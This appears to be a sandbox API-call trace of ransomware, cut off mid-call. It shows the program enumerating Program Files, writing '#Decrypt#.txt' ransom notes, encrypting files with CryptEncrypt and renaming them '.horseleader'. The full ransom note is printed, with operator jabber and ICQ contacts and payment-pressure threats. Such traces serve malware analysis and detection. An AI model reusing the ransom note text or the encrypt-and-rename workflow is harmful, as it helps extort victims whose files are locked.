\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.338] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0251.339] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.339] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0251.339] CloseHandle (hObject=0x1cc) returned 1 [0251.339] 
GetProcessHeap () returned 0x780000 [0251.339] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0251.339] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="System", cAlternateFileName="")) returned 0 [0251.339] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0251.339] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\#Decrypt#.txt") returned 47 [0251.340] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0251.340] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.340] WriteFile (in: hFile=0x164, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0251.342] lstrlenA (lpString="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") returned 1368 [0251.342] WriteFile (in: hFile=0x164, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0251.342] CloseHandle (hObject=0x164) returned 1 [0251.342] GetProcessHeap () returned 0x780000 [0251.342] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0251.342] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0251.342] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0251.342] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\desktop.ini") returned 32 [0251.342] StrStrIW (lpFirst="desktop.ini", lpSrch=".horseleader") returned 0x0 [0251.342] lstrcmpW (lpString1="desktop.ini", lpString2="#Decrypt#.txt") returned 1 [0251.342] lstrcmpW (lpString1="desktop.ini", lpString2="_uninstalling_.png") returned 1 [0251.343] lstrlenW (lpString=".testttjffg") returned 11 [0251.343] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\desktop.ini", lpSrch=".testttjffg") returned 0x0 [0251.343] 
CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0251.343] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0251.343] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0251.343] lstrlenW (lpString="\\\\?\\C:\\Program Files\\desktop.ini") returned 32 [0251.343] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0251.343] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x32af538 | out: lpFileSize=0x32af538*=174) returned 1 [0251.343] ReadFile (in: hFile=0x164, lpBuffer=0x32aa478, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesRead=0x32af55c*=0xae, lpOverlapped=0x0) returned 1 [0251.344] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.344] WriteFile (in: hFile=0x164, lpBuffer=0x32aa478*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesWritten=0x32af55c*=0xae, lpOverlapped=0x0) returned 1 [0251.345] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.345] WriteFile (in: hFile=0x164, lpBuffer=0x32af530*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32af530*, lpNumberOfBytesWritten=0x32af55c*=0x4, lpOverlapped=0x0) returned 1 [0251.345] WriteFile (in: hFile=0x164, lpBuffer=0x32af478*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af55c, 
lpOverlapped=0x0 | out: lpBuffer=0x32af478*, lpNumberOfBytesWritten=0x32af55c*=0x80, lpOverlapped=0x0) returned 1 [0251.345] CloseHandle (hObject=0x164) returned 1 [0251.345] GetProcessHeap () returned 0x780000 [0251.345] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0251.345] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\desktop.ini.horseleader") returned 44 [0251.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Program Files\\desktop.ini.horseleader" (normalized: "c:\\program files\\desktop.ini.horseleader")) returned 1 [0251.346] GetProcessHeap () returned 0x780000 [0251.346] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0251.346] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe37936a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe37936a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0251.346] lstrcmpiW (lpString1="DVD Maker", lpString2="Windows") returned -1 [0251.346] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker") returned 30 [0251.346] lstrcmpW (lpString1="DVD Maker", lpString2=".") returned 1 [0251.346] lstrcmpW (lpString1="DVD Maker", lpString2="..") returned 1 [0251.346] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.346] GetProcessHeap () returned 0x780000 [0251.347] RtlAllocateHeap (HeapHandle=0x780000, 
Flags=0x8, Size=0x840) returned 0x7c8598 [0251.347] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\*") returned 32 [0251.347] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe37936a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe37936a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0251.347] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.347] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\.") returned 32 [0251.347] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.347] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe37936a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe37936a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0251.347] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.347] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\..") returned 33 [0251.347] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.347] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.347] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: 
lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf555900, ftCreationTime.dwHighDateTime=0x1d5dceb, ftLastAccessTime.dwLowDateTime=0x2051f700, ftLastAccessTime.dwHighDateTime=0x1d5791e, ftLastWriteTime.dwLowDateTime=0x2051f700, ftLastWriteTime.dwHighDateTime=0x1d5791e, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="active-charge.exe", cAlternateFileName="ACTIVE~1.EXE")) returned 1 [0251.347] lstrcmpiW (lpString1="active-charge.exe", lpString2="Windows") returned -1 [0251.347] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\active-charge.exe") returned 48 [0251.348] StrStrIW (lpFirst="active-charge.exe", lpSrch=".horseleader") returned 0x0 [0251.348] lstrcmpW (lpString1="active-charge.exe", lpString2="#Decrypt#.txt") returned 1 [0251.348] lstrcmpW (lpString1="active-charge.exe", lpString2="_uninstalling_.png") returned 1 [0251.348] lstrlenW (lpString=".testttjffg") returned 11 [0251.348] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\active-charge.exe", lpSrch=".testttjffg") returned 0x0 [0251.348] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.348] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\active-charge.exe" (normalized: "c:\\program files\\dvd maker\\active-charge.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.348] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab2e49a0, 
ftCreationTime.dwHighDateTime=0x1d5a5ec, ftLastAccessTime.dwLowDateTime=0xa7eec750, ftLastAccessTime.dwHighDateTime=0x1d594db, ftLastWriteTime.dwLowDateTime=0xa7eec750, ftLastWriteTime.dwHighDateTime=0x1d594db, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="afr38.exe", cAlternateFileName="")) returned 1 [0251.348] lstrcmpiW (lpString1="afr38.exe", lpString2="Windows") returned -1 [0251.349] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\afr38.exe") returned 40 [0251.349] StrStrIW (lpFirst="afr38.exe", lpSrch=".horseleader") returned 0x0 [0251.349] lstrcmpW (lpString1="afr38.exe", lpString2="#Decrypt#.txt") returned 1 [0251.349] lstrcmpW (lpString1="afr38.exe", lpString2="_uninstalling_.png") returned 1 [0251.349] lstrlenW (lpString=".testttjffg") returned 11 [0251.349] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\afr38.exe", lpSrch=".testttjffg") returned 0x0 [0251.349] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.349] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.349] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\afr38.exe" (normalized: "c:\\program files\\dvd maker\\afr38.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.349] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ed7565, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0ed7565, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0efd6c5, 
ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="audiodepthconverter.ax", cAlternateFileName="")) returned 1 [0251.349] lstrcmpiW (lpString1="audiodepthconverter.ax", lpString2="Windows") returned -1 [0251.349] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax") returned 53 [0251.349] StrStrIW (lpFirst="audiodepthconverter.ax", lpSrch=".horseleader") returned 0x0 [0251.349] lstrcmpW (lpString1="audiodepthconverter.ax", lpString2="#Decrypt#.txt") returned 1 [0251.349] lstrcmpW (lpString1="audiodepthconverter.ax", lpString2="_uninstalling_.png") returned 1 [0251.349] lstrlenW (lpString=".testttjffg") returned 11 [0251.349] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax", lpSrch=".testttjffg") returned 0x0 [0251.350] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.350] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.350] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax" (normalized: "c:\\program files\\dvd maker\\audiodepthconverter.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.351] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499cc441, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x499cc441, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x499cc441, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1303c, 
dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bod_r.TTF", cAlternateFileName="")) returned 1 [0251.351] lstrcmpiW (lpString1="bod_r.TTF", lpString2="Windows") returned -1 [0251.351] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF") returned 40 [0251.351] StrStrIW (lpFirst="bod_r.TTF", lpSrch=".horseleader") returned 0x0 [0251.351] lstrcmpW (lpString1="bod_r.TTF", lpString2="#Decrypt#.txt") returned 1 [0251.351] lstrcmpW (lpString1="bod_r.TTF", lpString2="_uninstalling_.png") returned 1 [0251.351] lstrlenW (lpString=".testttjffg") returned 11 [0251.351] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF", lpSrch=".testttjffg") returned 0x0 [0251.351] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.351] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.351] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF" (normalized: "c:\\program files\\dvd maker\\bod_r.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.352] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0eb1404, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0eb1404, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0ed7565, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="directshowtap.ax", cAlternateFileName="")) returned 1 [0251.352] lstrcmpiW (lpString1="directshowtap.ax", lpString2="Windows") returned -1 
[0251.352] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax") returned 47 [0251.353] StrStrIW (lpFirst="directshowtap.ax", lpSrch=".horseleader") returned 0x0 [0251.353] lstrcmpW (lpString1="directshowtap.ax", lpString2="#Decrypt#.txt") returned 1 [0251.353] lstrcmpW (lpString1="directshowtap.ax", lpString2="_uninstalling_.png") returned 1 [0251.353] lstrlenW (lpString=".testttjffg") returned 11 [0251.353] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax", lpSrch=".testttjffg") returned 0x0 [0251.353] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.353] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax" (normalized: "c:\\program files\\dvd maker\\directshowtap.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.353] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9ae6642, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xc9ae6642, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0xe1601f60, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x227600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="DVDMaker.exe", cAlternateFileName="")) returned 1 [0251.353] lstrcmpiW (lpString1="DVDMaker.exe", lpString2="Windows") returned -1 [0251.353] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe") 
returned 43 [0251.353] StrStrIW (lpFirst="DVDMaker.exe", lpSrch=".horseleader") returned 0x0 [0251.354] lstrcmpW (lpString1="DVDMaker.exe", lpString2="#Decrypt#.txt") returned 1 [0251.354] lstrcmpW (lpString1="DVDMaker.exe", lpString2="_uninstalling_.png") returned 1 [0251.354] lstrlenW (lpString=".testttjffg") returned 11 [0251.354] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe", lpSrch=".testttjffg") returned 0x0 [0251.354] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.354] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.354] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe" (normalized: "c:\\program files\\dvd maker\\dvdmaker.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.354] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xaa276ca7, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f05f082, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="en-US", cAlternateFileName="")) returned 1 [0251.354] lstrcmpiW (lpString1="en-US", 